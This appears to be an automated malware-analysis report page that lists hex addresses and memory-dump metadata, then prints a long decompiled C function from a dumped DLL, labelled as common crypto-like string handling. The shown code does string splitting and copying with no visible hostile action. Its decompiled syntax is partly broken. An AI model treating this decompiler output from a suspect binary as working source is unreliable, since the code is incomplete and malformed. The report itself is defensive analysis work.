0x6e78796e
0x6e787972
0x6e787975
0x6e78797a
0x6e78798b
0x6e78797c
0x6e78797c
0x6e787980
0x6e787983
0x6e787986
0x6e787986
0x6e787993
0x6e78799e
0x6e7879a4
0x6e7879ad
0x6e7879b0
0x6e7879b0
0x6e7879c0
0x6e7879c2
0x6e7879c8
0x6e7879d1
0x6e7879d5
0x6e7879d7
0x6e7879d7
0x6e7879e2
0x6e7879f4
0x6e7879fb
0x6e787a0b
0x6e787a10
0x6e787a16
0x6e787a23
0x6e787a2a
0x6e787a2f
0x6e787a37
0x6e787a37
0x6e787a3b
0x6e787a40
0x6e787a44
0x6e787a44
0x6e7879c2
0x6e786b23
0x6e786b32
0x6e786b40
0x6e786b53
0x6e786b56
0x6e786b5c
0x6e786b61
0x6e786b67
0x6e786b69
0x6e786b6b
0x6e786b70
0x6e786b79
0x6e786b87
0x6e786b9a
0x6e786ba6
0x6e786bbc
0x6e786bd4
0x6e786be5
0x6e786bfa
0x6e786c06
0x6e786c0b
0x6e786c14
0x6e786c1c
0x6e786c30
0x6e786c43
0x6e786c4f
0x6e786c5b
0x6e786c67
0x6e786c78
0x6e786c8d
0x6e786c9d
0x6e786cb6
0x6e786cc2
0x6e786cda
0x6e786cea
0x6e786cf6
0x6e786cfe
0x6e786d05
0x6e786d11
0x6e786d16
0x6e786d1d
0x6e787241
0x6e78724f
0x6e78726f
0x6e78727d
0x6e7872a6
0x6e7872ab
0x6e7872b2
0x6e7872b7
0x6e7872bb
0x6e7872c3
0x6e7872c5
0x6e7872ca
0x6e7872ce
0x6e7872ce
0x6e7872d0
0x6e7872d8
0x6e7872e5
0x6e7872ec
0x6e7872fa
0x6e7872ff
0x6e787300
0x6e787302
0x6e787302
0x6e787307
0x6e787307
0x6e787309
0x6e78730d
0x6e787311
0x6e787315
0x6e787319
0x6e78731d
0x6e78731d
0x6e787330
0x6e787341
0x6e78734f
0x6e78735d
0x6e787362
0x6e78736a
0x6e78736c
0x6e787370
0x6e787370
0x6e787372
0x6e78737f
0x6e787383
0x6e787388
0x6e78738a
0x6e78739a
0x6e78739c
0x6e78777d
0x6e787781
0x6e787789
0x6e78778e
0x6e78779c
0x6e7877ae
0x6e7877b5
0x6e7877c3
0x6e7877d3
0x6e7877dc
0x6e7877e5
0x6e7877f1
0x6e7877f6
0x6e7877f8
0x6e787811
0x6e787815
0x6e78781a
0x6e78781f
0x6e787821
0x6e787825
0x6e787827
0x6e787832
0x6e787832
0x6e787829
0x6e787829
0x6e78782c
0x00000000
0x6e78782e
0x6e78782e
0x6e78782e
0x6e78782c
0x6e787837
0x6e787839
0x6e78783c
0x6e78783c
0x6e787839
0x6e787841
0x00000000
0x6e7877fa
0x6e787808
0x6e78780d
0x6e78780f
0x6e78784e
0x6e78785b
0x6e78786c
0x6e787873
0x6e787881
0x6e787891
0x6e78789a
0x6e7878a3
0x6e7878af
0x6e7878b4
0x6e7878b6
0x6e7878e3
0x6e7878e3
0x6e7878e8
0x6e7878f3
0x6e7878fe
0x6e787907
0x6e78790c
0x6e787912
0x6e787917
0x6e787919
0x6e787925
0x6e787925
0x6e78792e
0x6e787933
0x6e787938
0x6e78793a
0x6e78793e
0x6e787940
0x6e78794b
0x6e78794b
0x6e787942
0x6e787942
0x6e787945
0x00000000
0x6e787947
0x6e787947
0x6e787947
0x6e787945
0x6e787950
0x6e787952
0x6e787955
0x6e787955
0x6e787952
0x6e78795a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e78780f
0x00000000
0x6e7877f8
0x6e78739c
0x6e7873a2
0x6e7873a2
0x6e7873a3
0x6e7873a3
0x6e7873ac
0x6e7873ac
0x6e7873b0
0x6e7873b4
0x6e7873b8
0x6e787718
0x6e787723
0x6e78772f
0x6e78773b
0x6e787744
0x6e787749
0x6e78774e
0x6e787750
0x6e787754
0x6e787756
0x6e787761
0x6e787761
0x6e787758
0x6e787758
0x6e78775b
0x00000000
0x6e78775d
0x6e78775d
0x6e78775d
0x6e78775b
0x6e787766
0x6e787768
0x6e78776b
0x6e78776b
0x6e787768
0x6e787770
0x6e7873be
0x6e7873c2
0x6e7873c9
0x6e7873d4
0x6e7873d9
0x6e7873dc
0x6e7873de
0x6e7873ee
0x6e787401
0x6e787406
0x6e787406
0x6e787417
0x6e787424
0x6e787430
0x6e78743c
0x6e787445
0x6e78744a
0x6e78744f
0x6e787451
0x6e787455
0x6e787457
0x6e787462
0x6e787462
0x6e787459
0x6e787459
0x6e78745c
0x00000000
0x6e78745e
0x6e78745e
0x6e78745e
0x6e78745c
0x6e787467
0x6e787469
0x6e78746c
0x6e78746c
0x6e787469
0x00000000
0x6e78744f
0x6e787487
0x6e787490
0x6e7874a3
0x6e7874b8
0x6e7874c4
0x6e7874dd
0x6e7874e4
0x6e7874ee
0x6e78750b
0x6e787523
0x6e787544
0x6e78754b
0x6e787557
0x6e787560
0x6e78756e
0x6e78757c
0x6e78758a
0x6e78758f
0x6e787595
0x6e78759c
0x6e7875a3
0x6e7875aa
0x6e7875bb
0x6e7875c0
0x6e7875c2
0x6e7875ca
0x6e7875ca
0x6e7875cc
0x6e7875cf
0x6e7875d1
0x6e7875d3
0x6e7875d6
0x6e7875e1
0x6e7875fb
0x6e787607
0x6e787607
0x6e787618
0x6e78761c
0x6e78761f
0x6e78761f
0x6e787642
0x6e787657
0x6e78765e
0x6e78766a
0x6e787687
0x6e78769f
0x6e7876c0
0x6e7876c9
0x6e7876d5
0x6e7876e1
0x6e7876ed
0x6e7876f6
0x6e787702
0x6e78770e
0x00000000
0x6e7875c4
0x6e7875c4
0x6e7875c5
0x6e7875c5
0x00000000
0x6e787471
0x6e787471
0x6e787472
0x6e78747a
0x6e78747a
0x6e787483
0x00000000
0x6e786d23
0x6e786d23
0x6e786d2f
0x6e786d45
0x6e786d51
0x6e786d62
0x6e786d6a
0x6e786d7b
0x6e786d84
0x6e786d91
0x6e786d9f
0x6e786daf
0x6e786db8
0x6e786db9
0x6e786dba
0x6e786dbb
0x6e786dbc
0x6e786dc1
0x6e786dc5
0x6e786dd1
0x6e786ddf
0x6e786de1
0x6e786ded
0x6e786e05
0x6e786e13
0x6e786e2f
0x6e786e3b
0x6e786e47
0x6e786e53
0x6e786e5f
0x6e786e64
0x6e786e6d
0x6e786e72
0x6e786e7b
0x6e786e80
0x6e786e88
0x6e787177
0x6e78717e
0x6e787180
0x6e787183
0x6e787185
0x6e787194
0x6e787194
0x6e787187
0x6e787189
0x6e78718c
0x6e78718f
0x6e78718f
0x6e78719d
0x6e78719f
0x6e7871a6
0x6e7871ac
0x6e7871af
0x6e7871af
0x6e7871bf
0x6e7871c1
0x6e7871c7
0x6e7871c7
0x6e7871c9
0x6e7871d0
0x6e7871d0
0x6e7871db
0x6e7871de
0x6e7871ed
0x6e7871f4
0x6e787204
0x6e787209
0x6e78720f
0x6e78721c
0x6e787223
0x6e787228
0x6e787230
0x6e787230
0x6e787234
0x6e787234
0x6e7871c1
0x6e786e93
0x6e786e96
0x6e786e9b
0x6e786e9d
0x6e786ea0
0x6e786f30
0x6e786f30
0x6e786f32
0x6e786f33
0x6e786f35
0x6e786f35
0x6e786ead
0x6e786eb4
0x6e786ebf
0x6e786edf
0x6e786ee1
0x6e786ee8
0x6e786eed
0x6e786eed
0x6e786eee
0x6e786efc
0x6e786efe
0x6e786f01
0x6e786f03
0x6e786f1b
0x6e786f20
0x6e786f05
0x6e786f0a
0x6e786f0f
0x6e786f0f
0x6e786f25
0x6e786f2b
0x6e786ef0
0x6e786ef5
0x6e786ef5
0x00000000
0x6e786eee
0x6e786f53
0x6e786f58
0x6e786f5f
0x6e786f67
0x6e786f73
0x6e786f78
0x6e786f80
0x00000000
0x00000000
0x6e786f86
0x6e786f8d
0x6e786f93
0x6e786f95
0x6e786f9b
0x00000000
0x00000000
0x6e786f9b
0x6e786fa1
0x6e786fa5
0x6e786fa7
0x6e786fb0
0x6e786fb2
0x6e786fca
0x6e786fdd
0x6e786fe4
0x6e787062
0x6e787078
0x6e787084
0x6e78709c
0x6e78709d
0x6e7870ae
0x6e7870ba
0x6e7870cf
0x6e7870e2
0x6e7870f2
0x6e7870f9
0x6e7870fa
0x6e7870fb
0x6e7870fc
0x6e787103
0x6e787118
0x6e787124
0x6e78712c
0x6e787138
0x6e787141
0x6e787143
0x6e787167
0x6e787170
0x6e787170
0x6e78714c
0x6e78714c
0x6e786fe6
0x6e786fed
0x6e786ff1
0x6e786ffd
0x6e787009
0x6e78700e
0x6e787010
0x00000000
0x00000000
0x6e787010
0x6e78701d
0x6e787029
0x6e787035
0x6e78703a
0x6e787053
0x6e787053
0x00000000

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a78a6973a7aab4eb6ac3469f5addcc10d3a4610abd70a854b3f533cf9431f89
Instruction ID: 556f004fd241a99f9f46d330a55a4fe1946e53e3d8b29f10a75ff20c0ad7d448
Opcode Fuzzy Hash: 5a78a6973a7aab4eb6ac3469f5addcc10d3a4610abd70a854b3f533cf9431f89
Instruction Fuzzy Hash: 4A8250302183419BD324DFA4DAA4BEFB3E9AF95308F104E2DD69A861F4EF715904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A50A0, Relevance: .8, Instructions: 835
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E6E7A50A0(signed int* __ecx, signed int* _a4, signed int _a8) {
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t265;
				intOrPtr* _t266;
				char* _t269;
				unsigned int _t276;
				signed int _t278;
				char* _t279;
				void* _t281;
				signed int _t282;
				intOrPtr* _t283;
				char* _t286;
				unsigned int _t293;
				signed int _t295;
				char* _t296;
				void* _t300;
				signed int _t302;
				unsigned int _t311;
				void* _t315;
				unsigned int _t321;
				signed int _t322;
				signed int _t327;
				signed int _t328;
				char _t332;
				signed int _t333;
				char _t339;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				char _t351;
				char _t354;
				signed int _t355;
				intOrPtr _t358;
				char* _t367;
				signed int _t373;
				signed int _t374;
				char* _t376;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				void* _t386;
				intOrPtr _t387;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				unsigned int _t395;
				signed int _t398;
				signed int _t399;
				char _t400;
				char _t401;
				signed int _t403;
				signed int _t404;
				char _t405;
				char _t406;
				signed int _t407;
				intOrPtr _t413;
				char* _t417;
				char _t418;
				char _t419;
				signed int _t421;
				unsigned int _t427;
				signed int _t429;
				void* _t431;
				char* _t433;
				char _t434;
				char _t435;
				char* _t442;
				char _t445;
				char _t446;
				char _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				char* _t455;
				char _t458;
				char _t459;
				signed int _t460;
				signed int _t464;
				char _t467;
				char _t468;
				char _t469;
				signed int _t471;
				signed int _t473;
				signed int _t474;
				char* _t477;
				char _t480;
				char _t481;
				signed int _t482;
				signed int _t486;
				signed int* _t488;
				char _t493;
				signed int _t496;
				intOrPtr* _t507;
				signed int _t509;
				intOrPtr* _t510;
				unsigned int _t512;
				intOrPtr _t514;
				intOrPtr _t515;
				signed int* _t517;
				void* _t519;
				void* _t521;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				char* _t527;
				char* _t528;
				signed int* _t531;
				unsigned int _t533;
				signed int _t535;
				void* _t537;
				void* _t538;
				void* _t540;
				void* _t542;

				_t537 = (_t535 & 0xfffffff0) - 0x44;
				_t365 = __ecx;
				_t442 = _a8;
				_t517 = _a4;
				if(_t442 == 0 ||  *_t442 == 0) {
					_push(0x10);
					 *_t517 = 1;
					_t265 = E6E791030();
					_push(8);
					_t517[1] = _t265;
					_t517[2] = 4;
					_t266 = E6E791030();
					_t507 = _t266;
					_t538 = _t537 + 8;
					if(_t507 == 0) {
						_t507 = 0;
					} else {
						_t398 =  *_t365;
						 *_t507 = 0;
						 *(_t507 + 4) = 0;
						if(_t398 == 0 ||  *_t398 == 0) {
							_push(0x40);
							_t367 = E6E791030();
							_t538 = _t538 + 4;
							_t269 =  *_t507;
							if(_t269 == 0) {
								 *_t367 = 0;
							} else {
								if(_t367 != 0) {
									_t445 =  *_t269;
									 *_t367 = _t445;
									if(_t445 != 0) {
										_t399 = 0;
										while(1) {
											_t399 = _t399 + 1;
											_t446 =  *((char*)(_t269 + _t399 * 2 - 1));
											 *((char*)(_t367 + _t399 * 2 - 1)) = _t446;
											if(_t446 == 0) {
												break;
											}
											_t447 =  *((char*)(_t269 + _t399 * 2));
											 *((char*)(_t367 + _t399 * 2)) = _t447;
											if(_t447 != 0) {
												continue;
											}
											break;
										}
										_t517 = _a4;
									}
								}
								_push(1);
								_push(_t269);
								E6E7910B0();
								_t538 = _t538 + 8;
							}
							 *_t507 = _t367;
							 *(_t507 + 4) = 0x40;
						} else {
							_t449 = _t398 & 0x0000000f;
							if(_t449 == 0) {
								L9:
								asm("pxor xmm0, xmm0");
								_t373 =  ~( ~_t449 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+edx]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									if(_t266 != 0) {
										break;
									}
									_t449 = _t449 + 0x10;
									if(_t449 < _t373) {
										continue;
									} else {
										if(_t373 >= 0x7fffffff) {
											L15:
											_t373 = 0x7fffffff;
										} else {
											while( *((char*)(_t373 + _t398)) != 0) {
												_t373 = _t373 + 1;
												if(_t373 < 0x7fffffff) {
													continue;
												} else {
													goto L15;
												}
												goto L16;
											}
										}
									}
									goto L16;
								}
								asm("bsf ebx, eax");
								_t373 = _t373 + _t449;
							} else {
								_t373 = 0;
								_t449 =  ~_t449 + 0x10;
								while( *((char*)(_t373 + _t398)) != 0) {
									_t373 = _t373 + 1;
									if(_t373 < _t449) {
										continue;
									} else {
										goto L9;
									}
									goto L16;
								}
							}
							L16:
							_t8 = _t373 + 1; // 0x80000000
							_t451 =  <=  ? 0x40 : _t8;
							if(_t451 > 0) {
								_t276 = (_t451 >> 5 >> 0x1a) + _t451 >> 6;
								_v76 = _t276;
								_t452 = _t451 & 0x8000003f;
								if(_t452 < 0) {
									_t452 = (_t452 - 0x00000001 | 0xffffffc0) + 1;
								}
								_t278 = _t276 + (0 | _t452 > 0x00000000) << 6;
								_v76 = _t278;
								_push(_t278);
								_v80 = _t398;
								_t279 = E6E791030();
								_t398 = _v80;
								_t538 = _t538 + 4;
								_t455 =  *_t507;
								_v72 = _t455;
								if(_t455 == 0) {
									 *_t279 = 0;
								} else {
									if(_t279 != 0) {
										_t459 =  *_t455;
										 *_t279 = _t459;
										if(_t459 != 0) {
											_v84 = _t373;
											_t460 = 0;
											_v80 = _t398;
											_t374 = _v72;
											while(1) {
												_t460 = _t460 + 1;
												_t400 =  *((char*)(_t374 + _t460 * 2 - 1));
												 *((char*)(_t279 + _t460 * 2 - 1)) = _t400;
												if(_t400 == 0) {
													break;
												}
												_t401 =  *((char*)(_t374 + _t460 * 2));
												 *((char*)(_t279 + _t460 * 2)) = _t401;
												if(_t401 != 0) {
													continue;
												}
												break;
											}
											_t373 = _v84;
											_t398 = _v80;
											_t517 = _a4;
										}
									}
									_push(1);
									_push(_v72);
									_v84 = _t279;
									_v80 = _t398;
									E6E7910B0();
									_t398 = _v80;
									_t279 = _v84;
									_t538 = _t538 + 8;
								}
								 *(_t507 + 4) = _v76;
								 *_t507 = _t279;
							} else {
								_t279 = 0;
							}
							if(_t279 != 0) {
								_t519 = 0;
								while(1) {
									_t458 =  *_t398;
									_t519 = _t519 + 1;
									 *_t279 = _t458;
									if(_t373 != 0 && _t519 == _t373) {
										break;
									}
									if(_t458 == 0) {
										_t517 = _a4;
									} else {
										_t279 = _t279 + 1;
										_t398 = _t398 + 1;
										continue;
									}
									goto L48;
								}
								_t517 = _a4;
								 *((char*)(_t279 + 1)) = 0;
							}
						}
					}
					L48:
					 *(_t517[1]) = _t507;
					return _t517;
				} else {
					_t509 =  *__ecx;
					_t281 = E6E7A5A90(_t509, _t442);
					_t464 = _a8;
					if(_t281 == 0) {
						_push(0x10);
						 *_t517 = 1;
						_t282 = E6E791030();
						_push(8);
						_t517[1] = _t282;
						_t517[2] = 4;
						_t283 = E6E791030();
						_t510 = _t283;
						_t540 = _t537 + 8;
						if(_t510 == 0) {
							_t510 = 0;
						} else {
							_t403 =  *__ecx;
							 *_t510 = 0;
							 *(_t510 + 4) = 0;
							if(_t403 == 0 ||  *_t403 == 0) {
								_push(0x40);
								_t376 = E6E791030();
								_t540 = _t540 + 4;
								_t286 =  *_t510;
								if(_t286 == 0) {
									 *_t376 = 0;
								} else {
									if(_t376 != 0) {
										_t467 =  *_t286;
										 *_t376 = _t467;
										if(_t467 != 0) {
											_t404 = 0;
											while(1) {
												_t404 = _t404 + 1;
												_t468 =  *((char*)(_t286 + _t404 * 2 - 1));
												 *((char*)(_t376 + _t404 * 2 - 1)) = _t468;
												if(_t468 == 0) {
													break;
												}
												_t469 =  *((char*)(_t286 + _t404 * 2));
												 *((char*)(_t376 + _t404 * 2)) = _t469;
												if(_t469 != 0) {
													continue;
												}
												break;
											}
											_t517 = _a4;
										}
									}
									_push(1);
									_push(_t286);
									E6E7910B0();
									_t540 = _t540 + 8;
								}
								 *_t510 = _t376;
								 *(_t510 + 4) = 0x40;
							} else {
								_t471 = _t403 & 0x0000000f;
								if(_t471 == 0) {
									L157:
									asm("pxor xmm0, xmm0");
									_t382 =  ~( ~_t471 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm1, [ecx+edx]");
										asm("pcmpeqb xmm1, xmm0");
										asm("pmovmskb eax, xmm1");
										if(_t283 != 0) {
											break;
										}
										_t471 = _t471 + 0x10;
										if(_t471 < _t382) {
											continue;
										} else {
											if(_t382 >= 0x7fffffff) {
												L163:
												_t382 = 0x7fffffff;
											} else {
												while( *((char*)(_t382 + _t403)) != 0) {
													_t382 = _t382 + 1;
													if(_t382 < 0x7fffffff) {
														continue;
													} else {
														goto L163;
													}
													goto L164;
												}
											}
										}
										goto L164;
									}
									asm("bsf ebx, eax");
									_t382 = _t382 + _t471;
								} else {
									_t382 = 0;
									_t471 =  ~_t471 + 0x10;
									while( *((char*)(_t382 + _t403)) != 0) {
										_t382 = _t382 + 1;
										if(_t382 < _t471) {
											continue;
										} else {
											goto L157;
										}
										goto L164;
									}
								}
								L164:
								_t220 = _t382 + 1; // 0x80000000
								_t473 =  <=  ? 0x40 : _t220;
								if(_t473 > 0) {
									_t293 = (_t473 >> 5 >> 0x1a) + _t473 >> 6;
									_v76 = _t293;
									_t474 = _t473 & 0x8000003f;
									if(_t474 < 0) {
										_t474 = (_t474 - 0x00000001 | 0xffffffc0) + 1;
									}
									_t295 = _t293 + (0 | _t474 > 0x00000000) << 6;
									_v76 = _t295;
									_push(_t295);
									_v80 = _t403;
									_t296 = E6E791030();
									_t403 = _v80;
									_t540 = _t540 + 4;
									_t477 =  *_t510;
									_v72 = _t477;
									if(_t477 == 0) {
										 *_t296 = 0;
									} else {
										if(_t296 != 0) {
											_t481 =  *_t477;
											 *_t296 = _t481;
											if(_t481 != 0) {
												_v84 = _t382;
												_t482 = 0;
												_v80 = _t403;
												_t383 = _v72;
												while(1) {
													_t482 = _t482 + 1;
													_t405 =  *((char*)(_t383 + _t482 * 2 - 1));
													 *((char*)(_t296 + _t482 * 2 - 1)) = _t405;
													if(_t405 == 0) {
														break;
													}
													_t406 =  *((char*)(_t383 + _t482 * 2));
													 *((char*)(_t296 + _t482 * 2)) = _t406;
													if(_t406 != 0) {
														continue;
													}
													break;
												}
												_t382 = _v84;
												_t403 = _v80;
												_t517 = _a4;
											}
										}
										_push(1);
										_push(_v72);
										_v84 = _t296;
										_v80 = _t403;
										E6E7910B0();
										_t403 = _v80;
										_t296 = _v84;
										_t540 = _t540 + 8;
									}
									 *(_t510 + 4) = _v76;
									 *_t510 = _t296;
								} else {
									_t296 = 0;
								}
								if(_t296 != 0) {
									_t521 = 0;
									while(1) {
										_t480 =  *_t403;
										_t521 = _t521 + 1;
										 *_t296 = _t480;
										if(_t382 != 0 && _t521 == _t382) {
											break;
										}
										if(_t480 == 0) {
											_t517 = _a4;
										} else {
											_t296 = _t296 + 1;
											_t403 = _t403 + 1;
											continue;
										}
										goto L196;
									}
									_t517 = _a4;
									 *((char*)(_t296 + 1)) = 0;
								}
							}
						}
						L196:
						 *(_t517[1]) = _t510;
						return _t517;
					} else {
						_t407 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_t385 = _t464 & 0x0000000f;
						if(_t385 == 0) {
							L54:
							asm("pxor xmm0, xmm0");
							_t413 =  ~( ~_t385 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ebx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb esi, xmm1");
								if(_t517 != 0) {
									break;
								}
								_t385 = _t385 + 0x10;
								if(_t385 < _t413) {
									continue;
								} else {
									if(_t413 >= 0x7fffffff) {
										L60:
										_t413 = 0x7fffffff;
									} else {
										while( *((char*)(_t413 + _t464)) != 0) {
											_t413 = _t413 + 1;
											if(_t413 < 0x7fffffff) {
												continue;
											} else {
												goto L60;
											}
											goto L61;
										}
									}
								}
								goto L61;
							}
							asm("bsf ecx, ecx");
							_t413 = _t517 + _t385;
						} else {
							_t385 =  ~_t385 + 0x10;
							while( *((char*)(_t407 + _t464)) != 0) {
								_t407 = _t407 + 1;
								if(_t407 < _t385) {
									continue;
								} else {
									goto L54;
								}
								goto L61;
							}
							asm("pxor xmm0, xmm0");
						}
						L61:
						_v28 = _t413;
						_t386 = _t281;
						do {
							_t387 = _t386 - _t509;
							if(_t387 == 0 || _t509 == 0 ||  *_t509 == 0) {
								_push(0x40);
								_t523 = E6E791030();
								_t537 = _t537 + 4;
								 *_t523 = 0;
							} else {
								_t58 = _t387 + 1; // 0x1
								_t525 =  <=  ? 0x40 : _t58;
								if(_t525 > 0) {
									_t311 = (_t525 >> 5 >> 0x1a) + _t525 >> 6;
									_t526 = _t525 & 0x8000003f;
									if(_t526 < 0) {
										_t526 = (_t526 - 0x00000001 | 0xffffffc0) + 1;
									}
									_push(_t311 + (0 | _t526 > 0x00000000) << 6);
									_t523 = E6E791030();
									_t537 = _t537 + 4;
									 *_t523 = 0;
									if(_t509 != 0) {
										_t315 = 0;
										while(1) {
											_t315 = _t315 + 1;
											_t493 =  *((char*)(_t315 + _t509 - 1));
											 *((char*)(_t315 + _t523 - 1)) = _t493;
											if(_t315 == _t387) {
												break;
											}
											if(_t493 != 0) {
												continue;
											} else {
											}
											goto L75;
										}
										 *((char*)(_t315 + _t523)) = 0;
									}
								} else {
									_t523 = 0;
								}
							}
							L75:
							_t486 = _v56;
							_t300 =  >  ? _t486 : 0;
							_t301 =  >=  ? _t486 : _t300;
							_v24 =  >=  ? _t486 : _t300;
							_t302 = _v48;
							if(_t486 == _t302) {
								_v48 = _t302 + 4;
								_push(0x10 + _t302 * 4);
								_v60 = E6E791030();
								E6E790C10(_v60, _v52, _v56 << 2);
								_push(4);
								_push(_v52);
								E6E7910B0();
								_t537 = _t537 + 0x18;
								_v52 = _v60;
								_t486 = _v56;
							}
							_t487 = _t486 != _v24;
							if(_t486 != _v24) {
								E6E790BC0(_v52 + _v24 * 4 + 4, _v52 + _v24 * 4, _t487 << 2);
								_t537 = _t537 + 0xc;
							}
							_push(8);
							_t488 = E6E791030();
							_t542 = _t537 + 4;
							if(_t488 == 0) {
								_t488 = 0;
							} else {
								 *_t488 = 0;
								_t488[1] = 0;
								if(_t523 == 0 ||  *_t523 == 0) {
									_push(0x40);
									_v64 = _t488;
									_t327 = E6E791030();
									_t488 = _v64;
									_v76 = _t327;
									_t542 = _t542 + 4;
									_t328 =  *_t488;
									_v80 = _t328;
									if(_t328 == 0) {
										 *_v76 = 0;
									} else {
										if(_v76 != 0) {
											_t417 = _v76;
											_t332 =  *_t328;
											 *_t417 = _t332;
											if(_t332 != 0) {
												_v84 = _t523;
												_t333 = 0;
												_v40 = _t387;
												_v44 = _t509;
												_t393 = _v80;
												_t527 = _t417;
												while(1) {
													_t333 = _t333 + 1;
													_t418 =  *((char*)(_t393 + _t333 * 2 - 1));
													 *((char*)(_t527 + _t333 * 2 - 1)) = _t418;
													if(_t418 == 0) {
														break;
													}
													_t419 =  *((char*)(_t393 + _t333 * 2));
													 *((char*)(_t527 + _t333 * 2)) = _t419;
													if(_t419 != 0) {
														continue;
													}
													break;
												}
												_t523 = _v84;
												_t387 = _v40;
												_t509 = _v44;
											}
										}
										_push(1);
										_push(_v80);
										_v64 = _t488;
										E6E7910B0();
										_t488 = _v64;
										_t542 = _t542 + 8;
									}
									 *_t488 = _v76;
									_t488[1] = 0x40;
								} else {
									_t421 = _t523 & 0x0000000f;
									if(_t421 == 0) {
										L86:
										asm("pxor xmm1, xmm1");
										_t339 =  ~( ~_t421 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										_v36 = _t339;
										_v44 = _t509;
										_t514 = _t339;
										while(1) {
											asm("movdqu xmm0, [esi+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb eax, xmm0");
											if(_t339 != 0) {
												break;
											}
											_t421 = _t421 + 0x10;
											if(_t421 < _t514) {
												continue;
											} else {
												_v36 = _t514;
												_t509 = _v44;
												if(_v36 >= 0x7fffffff) {
													L93:
													_v36 = 0x7fffffff;
												} else {
													_t358 = _v36;
													while( *((char*)(_t358 + _t523)) != 0) {
														_t358 = _t358 + 1;
														if(_t358 < 0x7fffffff) {
															continue;
														} else {
															goto L93;
														}
														goto L94;
													}
													goto L145;
												}
											}
											goto L94;
										}
										asm("bsf eax, eax");
										_t509 = _v44;
										_v36 = _t339 + _t421;
									} else {
										_v36 = 0;
										_t358 = _v36;
										_t421 =  ~_t421 + 0x10;
										while( *((char*)(_t358 + _t523)) != 0) {
											_t358 = _t358 + 1;
											if(_t358 < _t421) {
												continue;
											} else {
												goto L86;
											}
											goto L94;
										}
										L145:
										_v36 = _t358;
									}
									L94:
									_t343 =  <=  ? 0x40 : _v36 + 1;
									if(_t343 > 0) {
										_t427 = (_t343 >> 5 >> 0x1a) + _t343 >> 6;
										_v72 = _t427;
										_t344 = _t343 & 0x8000003f;
										if(_t344 < 0) {
											_t344 = (_t344 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t429 = _t427 + (0 | _t344 > 0x00000000) << 6;
										_v72 = _t429;
										_push(_t429);
										_v64 = _t488;
										_t347 = E6E791030();
										_t488 = _v64;
										_v32 = _t347;
										_t542 = _t542 + 4;
										_t348 =  *_t488;
										_v68 = _t348;
										if(_t348 == 0) {
											 *_v32 = 0;
										} else {
											if(_v32 != 0) {
												_t354 =  *_t348;
												_t433 = _v32;
												 *_t433 = _t354;
												if(_t354 != 0) {
													_v84 = _t523;
													_t355 = 0;
													_v40 = _t387;
													_v44 = _t509;
													_t395 = _v68;
													_t528 = _t433;
													while(1) {
														_t355 = _t355 + 1;
														_t434 =  *((char*)(_t395 + _t355 * 2 - 1));
														 *((char*)(_t528 + _t355 * 2 - 1)) = _t434;
														if(_t434 == 0) {
															break;
														}
														_t435 =  *((char*)(_t395 + _t355 * 2));
														 *((char*)(_t528 + _t355 * 2)) = _t435;
														if(_t435 != 0) {
															continue;
														}
														break;
													}
													_t523 = _v84;
													_t387 = _v40;
													_t509 = _v44;
												}
											}
											_push(1);
											_push(_v68);
											_v64 = _t488;
											E6E7910B0();
											_t488 = _v64;
											_t542 = _t542 + 8;
										}
										_t488[1] = _v72;
										 *_t488 = _v32;
									} else {
										_v32 = 0;
									}
									if(_v32 != 0 && _t523 != 0) {
										_v40 = _t387;
										_t431 = 0;
										_v44 = _t509;
										_t394 = _v32;
										_t515 = _v36;
										while(1) {
											_t431 = _t431 + 1;
											_t351 =  *((char*)(_t431 + _t523 - 1));
											 *((char*)(_t431 + _t394 - 1)) = _t351;
											if(_t515 != 0 && _t431 == _t515) {
												break;
											}
											if(_t351 != 0) {
												continue;
											} else {
												_t387 = _v40;
												_t509 = _v44;
											}
											goto L126;
										}
										_t387 = _v40;
										_t509 = _v44;
										 *((char*)(_t431 + _v32)) = 0;
									}
								}
							}
							L126:
							 *(_v52 + _v24 * 4) = _t488;
							_v56 = _v56 + 1;
							_push(1);
							_push(_t523);
							E6E7910B0();
							_t537 = _t542 + 8;
							_t509 = _t509 + _t387 + _v28;
							_t386 = E6E7A5A90(_t509, _a8);
						} while (_t386 != 0);
						_t531 = _a4;
						E6E7A37E0( &_v56, _t509, _v56);
						 *_t531 = 0;
						_t531[1] = 0;
						_t531[2] = 0;
						E6E7A3B00(_t531,  &_v56);
						_t512 = _v68;
						_v68 = 0;
						_v60 = 0;
						_t496 = _v64;
						if(_t512 > 0) {
							_t321 = _t512 >> 1;
							if(_t321 == 0) {
								_t322 = 1;
							} else {
								_t392 = 0;
								_t533 = _t321;
								do {
									_t440 =  *((intOrPtr*)(_t496 + _t392 * 8));
